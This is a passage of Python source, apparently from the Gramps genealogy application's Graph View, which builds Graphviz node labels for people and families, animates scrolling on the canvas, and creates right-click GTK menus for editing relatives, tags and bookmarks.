'</tr>'
'<tr>'
'<td ALIGN="LEFT" BALIGN="LEFT" CELLPADDING="5">%(birth_wraped)s'
'</td>'
'<td rowspan="2">%(img)s</td>'
'</tr>'
'<tr>'
'<td ALIGN="LEFT" BALIGN="LEFT" CELLPADDING="5">%(death_wraped)s'
'</td>'
'</tr>'
'<tr>'
' <td colspan="2">%(tags)s</td>'
'</tr>'
'</TABLE>'
),
(2, _('Image on left side'),
'<TABLE '
'BORDER="0" CELLSPACING="5" CELLPADDING="0" CELLBORDER="0">'
'<tr>'
'<td colspan="2"><FONT POINT-SIZE="%(bsize)3.1f"><B>%(name)s'
'</B></FONT></td>'
'</tr>'
'<tr>'
'<td rowspan="2">%(img)s</td>'
'<td ALIGN="LEFT" BALIGN="LEFT" CELLPADDING="5">%(birth_wraped)s'
'</td>'
'</tr>'
'<tr>'
'<td ALIGN="LEFT" BALIGN="LEFT" CELLPADDING="5">%(death_wraped)s'
'</td>'
'</tr>'
'<tr>'
' <td colspan="2">%(tags)s</td>'
'</tr>'
'</TABLE>'
),
(3, _('Normal'),
'<TABLE '
'BORDER="0" CELLSPACING="2" CELLPADDING="0" CELLBORDER="0">'
'<TR><TD>%(img)s</TD></TR>'
'<TR><TD><FONT POINT-SIZE="%(bsize)3.1f"><B>%(name)s'
'</B></FONT></TD></TR>'
'<TR><TD ALIGN="LEFT" BALIGN="LEFT">%(birth_wraped)s</TD></TR>'
'<TR><TD ALIGN="LEFT" BALIGN="LEFT">%(death_wraped)s</TD></TR>'
'<TR><TD>%(tags)s</TD></TR>'
'</TABLE>'
)]
if index < 0:
return person_themes
if index < len(person_themes):
return person_themes[index]
else:
return person_themes[0]
def get_person_label(self, person):
"""
Return person label string (with tags).
"""
# Start an HTML table.
# Remember to close the table afterwards!
#
# This isn't a free-form HTML format here...just a few keywords that
# happen to be similar to keywords commonly seen in HTML.
# For additional information on what is allowed, see:
#
# http://www.graphviz.org/info/shapes.html#html
#
# Will use html.escape to avoid '&', '<', '>' in the strings.
# FIRST get all strings: img, name, dates, tags
# see if we have an image to use for this person
image = ''
if self.show_images:
image = self.view.graph_widget.get_person_image(person,
kind='path')
if not image and self.show_avatars:
image = self.avatars.get_avatar(gender=person.gender)
if image is not None:
image = '<IMG SRC="%s"/>' % image
else:
image = ''
# get the person's name
name = displayer.display_name(person.get_primary_name())
# name string should not be empty
name = escape(name) if name else ' '
# birth, death is a lists [date, place]
birth, death = self.get_date_strings(person)
birth_str = ''
death_str = ''
birth_wraped = ''
death_wraped = ''
# There are two ways of displaying dates:
# 1) full and on two lines:
# b. 1890-12-31 - BirthPlace
# d. 1960-01-02 - DeathPlace
if self.show_full_dates or self.show_places:
# add symbols
if birth[0]:
birth[0] = _('%s %s') % (self.bth, birth[0])
birth_wraped = birth[0]
birth_str = birth[0]
if birth[1]:
birth_wraped += '<BR/>'
birth_str += ' '
elif birth[1]:
birth_wraped = _('%s ') % self.bth
birth_str = _('%s ') % self.bth
birth_wraped += birth[1]
birth_str += birth[1]
if death[0]:
death[0] = _('%s %s') % (self.dth, death[0])
death_wraped = death[0]
death_str = death[0]
if death[1]:
death_wraped += '<BR/>'
death_str += ' '
elif death[1]:
death_wraped = _('%s ') % self.dth
death_str = _('%s ') % self.dth
death_wraped += death[1]
death_str += death[1]
# 2) simple and on one line:
# (1890 - 1960)
else:
if birth[0] or death[0]:
birth_str = '(%s - %s)' % (birth[0], death[0])
# add symbols
if image:
if birth[0]:
birth_wraped = _('%s %s') % (self.bth, birth[0])
if death[0]:
death_wraped = _('%s %s') % (self.dth, death[0])
else:
birth_wraped = birth_str
# get tags table for person and add tooltip for node
tag_table = ''
if self.show_tag_color:
tags, tag_table = self.get_tags_and_table(person)
if tag_table:
self.add_tags_tooltip(person.handle, tags)
# apply theme to person label
if(image or self.person_theme_index == 0 or
self.person_theme_index == 3):
p_theme = self.get_person_themes(self.person_theme_index)
else:
# use default theme if no image
p_theme = self.get_person_themes(3)
label = p_theme[2] % {'img': image,
'name': name,
'birth_str': birth_str,
'death_str': death_str,
'birth_wraped': birth_wraped,
'death_wraped': death_wraped,
'tags': tag_table,
'bsize' : self.bold_size}
return label
def get_family_label(self, family):
"""
Return family label string (with tags).
"""
# start main html table
label = ('<TABLE '
'BORDER="0" CELLSPACING="2" CELLPADDING="0" CELLBORDER="0">')
# add dates strtings to table
event_str = ['', '']
for event_ref in family.get_event_ref_list():
event = self.database.get_event_from_handle(event_ref.ref)
if (event.type == EventType.MARRIAGE and
(event_ref.get_role() == EventRoleType.FAMILY or
event_ref.get_role() == EventRoleType.PRIMARY)):
event_str = self.get_event_string(event)
break
if event_str[0] and event_str[1]:
event_str = '%s<BR/>%s' % (event_str[0], event_str[1])
elif event_str[0]:
event_str = event_str[0]
elif event_str[1]:
event_str = event_str[1]
else:
event_str = ''
label += '<TR><TD>%s</TD></TR>' % event_str
# add tags table for family and add tooltip for node
if self.show_tag_color:
tags, tag_table = self.get_tags_and_table(family)
if tag_table:
label += '<TR><TD>%s</TD></TR>' % tag_table
self.add_tags_tooltip(family.handle, tags)
# close main table
label += '</TABLE>'
return label
def get_date_strings(self, person):
"""
Returns tuple of birth/christening and death/burying date strings.
"""
birth_event = get_birth_or_fallback(self.database, person)
if birth_event:
birth = self.get_event_string(birth_event)
else:
birth = ['', '']
death_event = get_death_or_fallback(self.database, person)
if death_event:
death = self.get_event_string(death_event)
else:
death = ['', '']
return (birth, death)
def get_event_string(self, event):
"""
Return string for an event label.
Based on the data availability and preferences, we select one
of the following for a given event:
year only
complete date
place name
empty string
"""
if event:
place_title = place_displayer.display_event(self.database, event,
fmt=self.place_format)
date_object = event.get_date_object()
date = ''
place = ''
# shall we display full date
# or do we have a valid year to display only year
if(self.show_full_dates and date_object.get_text() or
date_object.get_year_valid()):
if self.show_full_dates:
date = '%s' % datehandler.get_date(event)
else:
date = '%i' % date_object.get_year()
# shall we add the place?
if self.show_places and place_title:
place = place_title
return [escape(date), escape(place)]
else:
if place_title and self.show_places:
return ['', escape(place_title)]
return ['', '']
def add_link(self, id1, id2, style="", head="", tail="", comment="",
bold=False, color=""):
"""
Add a link between two nodes.
Gramps handles are used as nodes but need to be prefixed
with an underscore because Graphviz does not like IDs
that begin with a number.
"""
self.write(' _%s -> _%s' % (id1, id2))
boldok = False
if id1 in self.current_list:
if id2 in self.current_list:
boldok = True
self.write(' [')
if style:
self.write(' style=%s' % style)
if head:
self.write(' arrowhead=%s' % head)
if tail:
self.write(' arrowtail=%s' % tail)
if bold and boldok:
self.write(' penwidth=%d' % 5)
if color:
self.write(' color="%s"' % color)
else:
# if not path to home than set default color of link
self.write(' color="%s"' % self.colors['link_color'])
self.write(' ]')
self.write(';')
if comment:
self.write(' // %s' % comment)
self.write('\n')
def add_node(self, node_id, label, shape="", color="",
style="", fillcolor="", url="", fontsize=""):
"""
Add a node to this graph.
Nodes can be different shapes like boxes and circles.
Gramps handles are used as nodes but need to be prefixed with an
underscore because Graphviz does not like IDs that begin with a number.
"""
text = '[margin="0.11,0.08"'
if shape:
text += ' shape="%s"' % shape
if color:
text += ' color="%s"' % color
if fillcolor:
color = hex_to_rgb_float(fillcolor)
yiq = (color[0] * 299 + color[1] * 587 + color[2] * 114)
fontcolor = "#ffffff" if yiq < 500 else "#000000"
text += ' fillcolor="%s" fontcolor="%s"' % (fillcolor, fontcolor)
if style:
text += ' style="%s"' % style
if fontsize:
text += ' fontsize="%s"' % fontsize
# note that we always output a label -- even if an empty string --
# otherwise GraphViz uses the node ID as the label which is unlikely
# to be what the user wants to see in the graph
text += ' label=<%s>' % label
if url:
text += ' URL="%s"' % url
text += " ]"
self.write(' _%s %s;\n' % (node_id, text))
def add_tags_tooltip(self, handle, tag_list):
"""
Add tooltip to dict {handle, tooltip}.
"""
tooltip_str = _('<b>Tags:</b>')
for tag in tag_list:
tooltip_str += ('\n<span background="%s"> </span> - %s'
% (tag.get_color(), tag.get_name()))
self.view.tags_tooltips[handle] = tooltip_str
def start_subgraph(self, graph_id):
"""
Opens a subgraph which is used to keep together related nodes
on the graph.
"""
self.write('\n subgraph cluster_%s\n' % graph_id)
self.write(' {\n')
# no border around subgraph (#0002176)
self.write(' style="invis";\n')
def end_subgraph(self):
"""
Closes a subgraph section.
"""
self.write(' }\n\n')
def write(self, text):
"""
Write text to the dot file.
"""
if self.dot:
self.dot.write(text)
#-------------------------------------------------------------------------
#
# CanvasAnimation
#
#-------------------------------------------------------------------------
class CanvasAnimation(object):
"""
Produce animation for operations with canvas.
"""
def __init__(self, view, canvas, scroll_window):
"""
We need canvas and window in which it placed.
And view to get config.
"""
self.view = view
self.canvas = canvas
self.hadjustment = scroll_window.get_hadjustment()
self.vadjustment = scroll_window.get_vadjustment()
self.items_list = []
self.in_motion = False
self.max_count = self.view._config.get(
'interface.graphview-animation-count')
self.max_count = self.max_count * 2 # must be modulo 2
self.show_animation = self.view._config.get(
'interface.graphview-show-animation')
# delay between steps in microseconds
self.speed = self.view._config.get(
'interface.graphview-animation-speed')
self.speed = 50 * int(self.speed)
# length of step
self.step_len = 10
# separated counter and direction of shaking
# for each item that in shake procedure
self.counter = {}
self.shake = {}
self.in_shake = []
def update_items(self, items_list):
"""
Update list of items for current graph.
"""
self.items_list.clear()
self.items_list.extend(items_list)
self.in_shake.clear()
# clear counters and shakes - items not exists anymore
self.counter.clear()
self.shake.clear()
def stop_animation(self):
"""
Stop move_to animation.
And wait while thread is finished.
"""
self.in_motion = False
try:
self.thread.join()
except:
pass
def stop_shake_animation(self, item, stoped):
"""
Processing of 'animation-finished' signal.
Stop or keep shaking item depending on counter for item.
"""
counter = self.counter.get(item.title)
shake = self.shake.get(item.title)
if (not stoped) and counter and shake and counter < self.max_count:
self.shake[item.title] = (-1) * self.shake[item.title]
self.counter[item.title] += 1
item.animate(0, self.shake[item.title], 1, 0, False,
self.speed, 10, 0)
else:
item.disconnect_by_func(self.stop_shake_animation)
try:
self.counter.pop(item.title)
self.shake.pop(item.title)
except:
pass
def shake_person(self, person_handle):
"""
Shake person node to help to see it.
Use build-in function of CanvasItem.
"""
item = self.get_item_by_title(person_handle)
if item:
self.shake_item(item)
def shake_item(self, item):
"""
Shake item to help to see it.
Use build-in function of CanvasItem.
"""
if item and self.show_animation and self.max_count > 0:
if not self.counter.get(item.title):
self.in_shake.append(item)
self.counter[item.title] = 1
self.shake[item.title] = 10
item.connect('animation-finished', self.stop_shake_animation)
item.animate(0, self.shake[item.title], 1, 0, False,
self.speed, 10, 0)
def get_item_by_title(self, handle):
"""
Find item by title.
"""
if handle:
for item in self.items_list:
if item.title == handle:
return item
return None
def move_to_person(self, handle, animated):
"""
Move graph to specified person by handle.
"""
self.stop_animation()
item = self.get_item_by_title(handle)
if item:
bounds = item.get_bounds()
# calculate middle of node coordinates
xxx = (bounds.x2 - (bounds.x2 - bounds.x1) / 2)
yyy = (bounds.y1 - (bounds.y1 - bounds.y2) / 2)
self.move_to(item, (xxx, yyy), animated)
return True
return False
def get_trace_to(self, destination):
"""
Return next point to destination from current position.
"""
# get current position (left-top corner) with scale
start_x = self.hadjustment.get_value() / self.canvas.get_scale()
start_y = self.vadjustment.get_value() / self.canvas.get_scale()
x_delta = destination[0] - start_x
y_delta = destination[1] - start_y
# calculate step count depending on length of the trace
trace_len = sqrt(pow(x_delta, 2) + pow(y_delta, 2))
steps_count = int(trace_len / self.step_len * self.canvas.get_scale())
# prevent division by 0
if steps_count > 0:
x_step = x_delta / steps_count
y_step = y_delta / steps_count
point = (start_x + x_step, start_y + y_step)
else:
point = destination
return point
def scroll_canvas(self, point):
"""
Scroll window to point on canvas.
"""
self.canvas.scroll_to(point[0], point[1])
def animation(self, item, destination):
"""
Animate scrolling to destination point in thread.
Dynamically get points to destination one by one
and try to scroll to them.
"""
self.in_motion = True
while self.in_motion:
# correct destination to window centre
h_offset = self.hadjustment.get_page_size() / 2
v_offset = self.vadjustment.get_page_size() / 3
# apply the scaling factor so the offset is adjusted to the scale
h_offset = h_offset / self.canvas.get_scale()
v_offset = v_offset / self.canvas.get_scale()
dest = (destination[0] - h_offset,
destination[1] - v_offset)
# get maximum scroll of window
max_scroll_x = ((self.hadjustment.get_upper() -
self.hadjustment.get_page_size()) /
self.canvas.get_scale())
max_scroll_y = ((self.vadjustment.get_upper() -
self.vadjustment.get_page_size()) /
self.canvas.get_scale())
# fix destination to fit in max scroll
if dest[0] > max_scroll_x:
dest = (max_scroll_x, dest[1])
if dest[0] < 0:
dest = (0, dest[1])
if dest[1] > max_scroll_y:
dest = (dest[0], max_scroll_y)
if dest[1] < 0:
dest = (dest[0], 0)
cur_pos = (self.hadjustment.get_value() / self.canvas.get_scale(),
self.vadjustment.get_value() / self.canvas.get_scale())
# finish if we already at destination
if dest == cur_pos:
break
# get next point to destination
point = self.get_trace_to(dest)
GLib.idle_add(self.scroll_canvas, point)
GLib.usleep(20 * self.speed)
# finish if we try to goto destination point
if point == dest:
break
self.in_motion = False
# shake item after scroll to it
self.shake_item(item)
def move_to(self, item, destination, animated):
"""
Move graph to specified position.
If 'animated' is True then movement will be animated.
It works with 'canvas.scroll_to' in thread.
"""
# if animated is True than run thread with animation
# else - just scroll_to immediately
if animated and self.show_animation:
self.thread = Thread(target=self.animation,
args=[item, destination])
self.thread.start()
else:
# correct destination to screen centre
h_offset = self.hadjustment.get_page_size() / 2
v_offset = self.vadjustment.get_page_size() / 3
# apply the scaling factor so the offset is adjusted to the scale
h_offset = h_offset / self.canvas.get_scale()
v_offset = v_offset / self.canvas.get_scale()
destination = (destination[0] - h_offset,
destination[1] - v_offset)
self.scroll_canvas(destination)
# shake item after scroll to it
self.shake_item(item)
#-------------------------------------------------------------------------
#
# Popup menu widget
#
#-------------------------------------------------------------------------
class PopupMenu(Gtk.Menu):
"""
Produce popup widget for right-click menu.
"""
def __init__(self, graph_widget, kind=None, handle=None):
"""
graph_widget: GraphWidget
kind: 'person', 'family', 'background'
handle: person or family handle
"""
Gtk.Menu.__init__(self)
self.set_reserve_toggle_size(False)
self.graph_widget = graph_widget
self.view = graph_widget.view
self.dbstate = graph_widget.dbstate
self.actions = graph_widget.actions
if kind == 'background':
self.background_menu()
elif kind == 'person' and handle is not None:
self.person_menu(handle)
elif kind == 'family' and handle is not None:
self.family_menu(handle)
def show_menu(self, event=None):
"""
Show popup menu.
"""
if (Gtk.MAJOR_VERSION >= 3) and (Gtk.MINOR_VERSION >= 22):
# new from gtk 3.22:
self.popup_at_pointer(event)
else:
if event:
self.popup(None, None, None, None,
event.get_button()[1], event.time)
else:
self.popup(None, None, None, None,
0, Gtk.get_current_event_time())
#self.popup(None, None, None, None, 0, 0)
def background_menu(self):
"""
Popup menu on background.
"""
menu_item = Gtk.CheckMenuItem(_('Show images'))
menu_item.set_active(
self.view._config.get('interface.graphview-show-images'))
menu_item.connect("activate", self.graph_widget.update_setting,
'interface.graphview-show-images')
menu_item.show()
self.append(menu_item)
menu_item = Gtk.CheckMenuItem(_('Highlight the home person'))
menu_item.set_active(
self.view._config.get('interface.graphview-highlight-home-person'))
menu_item.connect("activate", self.graph_widget.update_setting,
'interface.graphview-highlight-home-person')
menu_item.show()
self.append(menu_item)
menu_item = Gtk.CheckMenuItem(_('Show full dates'))
menu_item.set_active(
self.view._config.get('interface.graphview-show-full-dates'))
menu_item.connect("activate", self.graph_widget.update_setting,
'interface.graphview-show-full-dates')
menu_item.show()
self.append(menu_item)
menu_item = Gtk.CheckMenuItem(_('Show places'))
menu_item.set_active(
self.view._config.get('interface.graphview-show-places'))
menu_item.connect("activate", self.graph_widget.update_setting,
'interface.graphview-show-places')
menu_item.show()
self.append(menu_item)
menu_item = Gtk.CheckMenuItem(_('Show tags'))
menu_item.set_active(
self.view._config.get('interface.graphview-show-tags'))
menu_item.connect("activate", self.graph_widget.update_setting,
'interface.graphview-show-tags')
menu_item.show()
self.append(menu_item)
self.add_separator()
menu_item = Gtk.CheckMenuItem(_('Show animation'))
menu_item.set_active(
self.view._config.get('interface.graphview-show-animation'))
menu_item.connect("activate", self.graph_widget.update_setting,
'interface.graphview-show-animation')
menu_item.show()
self.append(menu_item)
# add sub menu for line type setting
menu_item, sub_menu = self.add_submenu(label=_('Lines type'))
spline = self.view._config.get('interface.graphview-show-lines')
entry = Gtk.RadioMenuItem(label=_('Direct'))
entry.connect("activate", self.graph_widget.update_lines_type,
0, 'interface.graphview-show-lines')
if spline == 0:
entry.set_active(True)
entry.show()
sub_menu.append(entry)
entry = Gtk.RadioMenuItem(label=_('Curves'))
entry.connect("activate", self.graph_widget.update_lines_type,
1, 'interface.graphview-show-lines')
if spline == 1:
entry.set_active(True)
entry.show()
sub_menu.append(entry)
entry = Gtk.RadioMenuItem(label=_('Ortho'))
entry.connect("activate", self.graph_widget.update_lines_type,
2, 'interface.graphview-show-lines')
if spline == 2:
entry.set_active(True)
entry.show()
sub_menu.append(entry)
# add help menu
self.add_separator()
self.append_help_menu_entry()
def person_menu(self, handle):
"""
Popup menu for person node.
"""
person = self.dbstate.db.get_person_from_handle(handle)
if person:
add_menuitem(self, _('Edit'),
handle, self.actions.edit_person)
add_menuitem(self, _('Copy'),
handle, self.actions.copy_person_to_clipboard)
add_menuitem(self, _('Delete'),
person, self.actions.remove_person)
self.add_separator()
# build tag submenu
item, tag_menu = self.add_submenu(label=_("Tags"))
add_menuitem(tag_menu, _('Select tags for person'),
[handle, 'person'], self.actions.edit_tag_list)
add_menuitem(tag_menu, _('Organize Tags...'),
[handle, 'person'], self.actions.organize_tags)
# go over spouses and build their menu
item, sp_menu = self.add_submenu(label=_("Spouses"))
add_menuitem(sp_menu, _('Add new family'),
handle, self.actions.add_spouse)
self.add_separator(sp_menu)
fam_list = person.get_family_handle_list()
for fam_id in fam_list:
family = self.dbstate.db.get_family_from_handle(fam_id)
if family.get_father_handle() == person.get_handle():
sp_id = family.get_mother_handle()
else:
sp_id = family.get_father_handle()
if not sp_id:
continue
spouse = self.dbstate.db.get_person_from_handle(sp_id)
if not spouse:
continue
self.add_menuitem(sp_menu, displayer.display(spouse),
self.graph_widget.move_to_person,
sp_id, True)
# go over siblings and build their menu
item, sib_menu = self.add_submenu(label=_("Siblings"))
pfam_list = person.get_parent_family_handle_list()
siblings = []
step_siblings = []
for f_h in pfam_list:
fam = self.dbstate.db.get_family_from_handle(f_h)
sib_list = fam.get_child_ref_list()
for sib_ref in sib_list:
sib_id = sib_ref.ref
if sib_id == person.get_handle():
continue
siblings.append(sib_id)
# collect a list of per-step-family step-siblings
for parent_h in [fam.get_father_handle(),
fam.get_mother_handle()]:
if not parent_h:
continue
parent = self.dbstate.db.get_person_from_handle(
parent_h)
other_families = [
self.dbstate.db.get_family_from_handle(fam_id)
for fam_id in parent.get_family_handle_list()
if fam_id not in pfam_list]
for step_fam in other_families:
fam_stepsiblings = [
sib_ref.ref for sib_ref in
step_fam.get_child_ref_list()
if not sib_ref.ref == person.get_handle()]
if fam_stepsiblings:
step_siblings.append(fam_stepsiblings)
# add siblings sub-menu with a bar between each siblings group
if siblings or step_siblings:
sibs = [siblings] + step_siblings
for sib_group in sibs:
for sib_id in sib_group:
sib = self.dbstate.db.get_person_from_handle(
sib_id)
if not sib:
continue
if find_children(self.dbstate.db, sib):
label = Gtk.Label(
label='<b><i>%s</i></b>'
% escape(displayer.display(sib)))
else:
label = Gtk.Label(
label=escape(displayer.display(sib)))
sib_item = Gtk.MenuItem()
label.set_use_markup(True)
label.show()
label.set_alignment(0, 0)
sib_item.add(label)
sib_item.connect("activate",
self.graph_widget.move_to_person,
sib_id, True)
sib_item.show()
sib_menu.append(sib_item)
if sibs.index(sib_group) < len(sibs) - 1:
self.add_separator(sib_menu)
else:
item.set_sensitive(0)
self.add_children_submenu(person=person)
# Go over parents and build their menu
item, par_menu = self.add_submenu(label=_("Parents"))
no_parents = True
par_list = find_parents(self.dbstate.db, person)
for par_id in par_list:
if not par_id:
continue
par = self.dbstate.db.get_person_from_handle(par_id)
if not par:
continue
if no_parents:
no_parents = False
if find_parents(self.dbstate.db, par):
label = Gtk.Label(label='<b><i>%s</i></b>'
% escape(displayer.display(par)))
else:
label = Gtk.Label(label=escape(displayer.display(par)))
par_item = Gtk.MenuItem()
label.set_use_markup(True)
label.show()
label.set_halign(Gtk.Align.START)
par_item.add(label)
par_item.connect("activate", self.graph_widget.move_to_person,
par_id, True)
par_item.show()
par_menu.append(par_item)
if no_parents:
# add button to add parents
add_menuitem(par_menu, _('Add parents'), handle,
self.actions.add_parents_to_person)
# go over related persons and build their menu
item, per_menu = self.add_submenu(label=_("Related"))
no_related = True
for p_id in find_witnessed_people(self.dbstate.db, person):
per = self.dbstate.db.get_person_from_handle(p_id)
if not per:
continue
if no_related:
no_related = False
self.add_menuitem(per_menu, displayer.display(per),
self.graph_widget.move_to_person,
p_id, True)
if no_related:
item.set_sensitive(0)
self.add_separator()
add_menuitem(self, _('Set as home person'),
handle, self.actions.set_home_person)
# check if we have person in bookmarks
marks = self.graph_widget.view.bookmarks.get_bookmarks().bookmarks
if handle in marks:
add_menuitem(self, _('Remove from bookmarks'), handle,
self.actions.remove_from_bookmarks)
else:
add_menuitem(self, _('Add to bookmarks'), [handle, person],
self.actions.add_to_bookmarks)
# QuickReports and WebConnect section
self.add_separator()
q_exists = self.add_quickreport_submenu(CATEGORY_QR_PERSON, handle)
w_exists = self.add_web_connect_submenu(handle)
if q_exists or w_exists:
self.add_separator()
self.append_help_menu_entry()
def add_quickreport_submenu(self, category, handle):
"""
Adds Quick Reports menu.
"""
def make_quick_report_callback(pdata, category, dbstate, uistate,
handle, track=[]):
return lambda x: run_report(dbstate, uistate, category, handle,
pdata, track=track)
# select the reports to show
showlst = []
pmgr = GuiPluginManager.get_instance()
for pdata in pmgr.get_reg_quick_reports():
if pdata.supported and pdata.category == category:
showlst.append(pdata)
showlst.sort(key=lambda x: x.name)
if showlst:
menu_item, quick_menu = self.add_submenu(_("Quick View"))
for pdata in showlst:
callback = make_quick_report_callback(
pdata, category, self.view.dbstate, self.view.uistate,
handle)
self.add_menuitem(quick_menu, pdata.name, callback)
return True
return False
def add_web_connect_submenu(self, handle):
"""
Adds Web Connect menu if some installed.
"""
def flatten(L):
"""
Flattens a possibly nested list. Removes None results, too.
"""
retval = []
if isinstance(L, (list, tuple)):
for item in L:
fitem = flatten(item)
if fitem is not None:
retval.extend(fitem)
elif L is not None:
retval.append(L)
return retval
# select the web connects to show
pmgr = GuiPluginManager.get_instance()
plugins = pmgr.process_plugin_data('WebConnect')
nav_group = self.view.navigation_type()
try:
connections = [plug(nav_group) if isinstance(plug, abc.Callable) else
plug for plug in plugins]
except BaseException:
import traceback
traceback.print_exc()
connections = []
connections = flatten(connections)
connections.sort(key=lambda plug: plug.name)
if connections:
menu_item, web_menu = self.add_submenu(_("Web Connection"))
for connect in connections:
callback = connect(self.view.dbstate, self.view.uistate,
nav_group, handle)
self.add_menuitem(web_menu, connect.name, callback)
return True
return False
def family_menu(self, handle):
"""
Popup menu for family node.
"""
family = self.dbstate.db.get_family_from_handle(handle)
if family:
add_menuitem(self, _('Edit'),
handle, self.actions.edit_family)
add_menuitem(self, _('Delete'),
family, self.actions.remove_family)
self.add_separator()
# build tag submenu
_item, tag_menu = self.add_submenu(label=_("Tags"))
add_menuitem(tag_menu, _('Select tags for family'),
[handle, 'family'], self.actions.edit_tag_list)
add_menuitem(tag_menu, _('Organize Tags...'),
[handle, 'family'], self.actions.organize_tags)
# build spouses menu
_item, sp_menu = self.add_submenu(label=_("Spouses"))
f_handle = family.get_father_handle()
m_handle = family.get_mother_handle()
if f_handle:
spouse = self.dbstate.db.get_person_from_handle(f_handle)
self.add_menuitem(sp_menu, displayer.display(spouse),
self.graph_widget.move_to_person,
f_handle, True)
else:
add_menuitem(sp_menu, _('Add father'), [family, 'father'],
self.actions.add_spouse_to_family)
if m_handle:
spouse = self.dbstate.db.get_person_from_handle(m_handle)
self.add_menuitem(sp_menu, displayer.display(spouse),
self.graph_widget.move_to_person,
m_handle, True)
else:
add_menuitem(sp_menu, _('Add mother'), [family, 'mother'],
self.actions.add_spouse_to_family)
self.add_children_submenu(family=family)
# QuickReports section
self.add_separator()
q_exists = self.add_quickreport_submenu(CATEGORY_QR_FAMILY, handle)
if q_exists:
self.add_separator()
self.append_help_menu_entry()
def add_children_submenu(self, person=None, family=None):
"""
Go over children and build their menu.
"""
item, child_menu = self.add_submenu(_("Children"))
no_child = True
childlist = []
if family:
for child_ref in family.get_child_ref_list():
childlist.append(child_ref.ref)
# allow to add a child to this family
add_menuitem(child_menu, _('Add child to family'),
family.get_handle(), self.actions.add_child_to_family)
self.add_separator(child_menu)
no_child = False
elif person:
childlist = find_children(self.dbstate.db, person)
for child_handle in childlist:
child = self.dbstate.db.get_person_from_handle(child_handle)
if not child:
continue
if no_child:
no_child = False
if find_children(self.dbstate.db, child):
label = Gtk.Label(label='<b><i>%s</i></b>'
% escape(displayer.display(child)))
else:
label = Gtk.Label(label=escape(displayer.display(child)))
child_item = Gtk.MenuItem()
label.set_use_markup(True)
label.show()
label.set_halign(Gtk.Align.START)
child_item.add(label)
child_item.connect("activate", self.graph_widget.move_to_person,
child_handle, True)
child_item.show()
child_menu.append(child_item)
if no_child:
item.set_sensitive(0)
def add_menuitem(self, menu, label, func, *args):
"""
Adds menu item.
"""
item = Gtk.MenuItem(label=label)
item.connect("activate", func, *args)
item.show()
menu.append(item)
return item
def add_submenu(self, label):
"""
Adds submenu.
"""
item = Gtk.MenuItem(label=label)
item.set_submenu(Gtk.Menu())
item.show()
self.append(item)
submenu = item.get_submenu()
submenu.set_reserve_toggle_size(False)
return item, submenu
def add_separator(self, menu=None):
"""
Adds separator to menu.
"""
if menu is None:
menu = self
menu_item = Gtk.SeparatorMenuItem()
menu_item.show()
menu.append(menu_item)
def append_help_menu_entry(self):
"""
Adds help (about) menu entry.
"""
item = Gtk.MenuItem(label=_("About Graph View"))
item.connect("activate", self.actions.on_help_clicked)
item.show()
self.append(item)
class Actions(Callback):
"""
Define actions.
"""
__signals__ = {
'focus-person-changed' : (str, ),
'active-changed' : (str, ),
'rebuild-graph' : None,
}
def __init__(self, dbstate, uistate, bookmarks):
"""
bookmarks - person bookmarks from GraphView(NavigationView).
"""
Callback.__init__(self)
self.dbstate = dbstate
self.uistate = uistate
self.bookmarks = bookmarks
def on_help_clicked(self, widget):
"""
Display the relevant portion of Gramps manual.
"""
display_url(WIKI_PAGE)
def add_spouse(self, obj):
"""
Add spouse to person (create new family to person).
See: gramps/plugins/view/relview.py (add_spouse)
"""
handle = obj.get_data()
family = Family()
person = self.dbstate.db.get_person_from_handle(handle)
if not person:
return
if person.gender == Person.MALE:
family.set_father_handle(person.handle)
else:
family.set_mother_handle(person.handle)
try:
EditFamily(self.dbstate, self.uistate, [], family)
except WindowActiveError:
pass
# set edited person to scroll on it after rebuilding graph
self.emit('focus-person-changed', (handle, ))
def add_spouse_to_family(self, obj):
"""
Adds spouse to existing family.
See: editfamily.py
"""
family, kind = obj.get_data()
try:
dialog = EditFamily(self.dbstate, self.uistate, [], family)
if kind == 'mother':
dialog.add_mother_clicked(None)
if kind == 'father':
dialog.add_father_clicked(None)
except WindowActiveError:
pass
def edit_person(self, obj, person_handle=None):
"""
Start a person editor for the selected person.
"""
if not (obj or person_handle):
return False
if person_handle:
handle = person_handle
else:
handle = obj.get_data()
person = self.dbstate.db.get_person_from_handle(handle)
try:
EditPerson(self.dbstate, self.uistate, [], person)
except WindowActiveError:
pass
# set edited person to scroll on it after rebuilding graph
self.emit('focus-person-changed', (handle, ))
def set_home_person(self, obj):
"""
Set the home person for database and make it active.
"""
handle = obj.get_data()
person = self.dbstate.db.get_person_from_handle(handle)
if person:
self.dbstate.db.set_default_person_handle(handle)
self.emit('active-changed', (handle, ))
def edit_family(self, obj, family_handle=None):
"""
Start a family editor for the selected family.
"""
if not (obj or family_handle):
return False
if family_handle:
handle = family_handle
else:
handle = obj.get_data()
family = self.dbstate.db.get_family_from_handle(handle)
try:
EditFamily(self.dbstate, self.uistate, [], family)
except WindowActiveError:
pass
# set edited family person to scroll on it after rebuilding graph
f_handle = family.get_father_handle()
if f_handle:
self.emit('focus-person-changed', (f_handle, ))
else:
m_handle = family.get_mother_handle()
if m_handle:
self.emit('focus-person-changed', (m_handle, ))
def copy_person_to_clipboard(self, obj):
"""
Renders the person data into some lines of text
and puts that into the clipboard.
"""
person_handle = obj.get_data()
person = self.dbstate.db.get_person_from_handle(person_handle)
if person:
_cb = Gtk.Clipboard.get_for_display(Gdk.Display.get_default(),
Gdk.SELECTION_CLIPBOARD)
format_helper = FormattingHelper(self.dbstate)
_cb.set_text(format_helper.format_person(person, 11), -1)
return True
return False
def edit_tag_list(self, obj):
"""
Edit tag list for person or family.
"""
handle, otype = obj.get_data()
if otype == 'person':
target = self.dbstate.db.get_person_from_handle(handle)
self.emit('focus-person-changed', (handle, ))
elif otype == 'family':
target = self.dbstate.db.get_family_from_handle(handle)
f_handle = target.get_father_handle()
if f_handle:
self.emit('focus-person-changed', (f_handle, ))
else:
m_handle = target.get_mother_handle()
if m_handle:
self.emit('focus-person-changed', (m_handle, ))
else:
return False
if target:
tag_list = []
for tag_handle in target.get_tag_list():
tag = self.dbstate.db.get_tag_from_handle(tag_handle)
if tag:
tag_list.append((tag_handle, tag.get_name()))
all_tags = []
for tag_handle in self.dbstate.db.get_tag_handles(
sort_handles=True):
tag = self.dbstate.db.get_tag_from_handle(tag_handle)
all_tags.append((tag.get_handle(), tag.get_name()))
try:
editor = EditTagList(tag_list, all_tags, self.uistate, [])
if editor.return_list is not None:
tag_list = editor.return_list
# Save tags to target object.
# Make the dialog modal so that the user can't start
# another database transaction while the one setting
# tags is still running.
pmon = progressdlg.ProgressMonitor(
